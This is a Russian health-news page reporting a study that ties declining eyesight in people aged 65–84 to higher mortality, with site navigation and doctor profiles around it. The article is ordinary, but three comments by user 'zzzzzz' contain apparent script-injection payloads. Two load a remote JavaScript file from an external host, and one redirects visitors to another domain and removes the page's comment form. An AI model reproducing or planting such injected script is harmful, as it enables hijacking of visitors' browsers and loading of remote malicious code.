Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Прищуриваетесь, чтобы уви...  >>  Прищуриваетесь, чтобы увидеть? Скоро вы умрете!
 
Обратная связь
 

Прищуриваетесь, чтобы увидеть? Скоро вы умрете!

Размер шрифта
06 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, снижение зрения в пожилом возрасте может быть очень опасным: согласно данным недавнего исследования, плохое зрение не только ухудшает качество жизни, но и может сократить ее продолжительность.

В исследовании приняли участие более 2 500 человек в возрасте от 65 до 84 лет. Состояние их здоровья было досконально изучено в момент начала эксперимента, а также спустя два года, шесть и восемь лет. Ученые выяснили, что ухудшение зрения со временем было связано с повышенным риском смерти пациента. Эти результаты были опубликованы в журнале JAMAOphthalmology.

Хотя эта работа и не доказывает наличие прямой причинно-следственной связи между потерей зрения и увеличением риска смерти, ученые во главе с Шэрон Крист из Университета Пердью уже выдвинули несколько теорий, которые призваны объяснить это явление. Они считают, что такой эффект может быть вызван тем, что людям с нарушениями зрения становится гораздо труднее выполнять обычные ежедневные дела, такие как поход по магазинам и работа по дому. У тех людей с подобными трудностями в  выполнении рутинных дел значительно снижалось качество жизни, а риск смерти возрастал с каждым годом на 3% и к концу исследования оказался на 31% выше.

«Наши результаты говорят о многом. Во-первых, они еще раз подчеркивают необходимость проведения первичной профилактики нарушений зрения», – рассказывает Шэрон Крист. «Более того, ранняя диагностика заболеваний, приводящих к ухудшению зрения, развита недостаточно хорошо. А ведь именно ранняя диагностика таких состояний может помочь предотвратить ухудшение зрения и его потерю». Ученые также говорят о том, что на сегодняшний день многие люди живут с нарушениями зрения, которые можно легко скорректировать, обратившись к специалисту, который поможет правильно подобрать очки или контактные линзы.

Ученые также считают, что если пожилым людям с подобными проблемами помогать в выполнении домашних дел, это может значительно увеличить их продолжительность жизни. Так что не забывайте навещать своих родных, вышедших на пенсию – ваша помощь может им очень пригодиться.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Елена

12 апреля 2015 в 12:13

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Профессия – пенсионер. Как проверить утром, жив ли ты пока   Как добавить 20 лет к жизни   Как правильно ходить в старости   Как подготовить ноги к старости  
30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности! 01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников
 
14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия 12 ноября 2012Старческие болезни больше не страшны
 

Слайдшоу

1
Почему от пожилых так пахнет
Вы проживете до 100 лет, если ответите «да» на эти вопросы
Опасности для пожилых зимой

Тесты

1
Как быстро вы стареете
Проверьте свое зрение
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.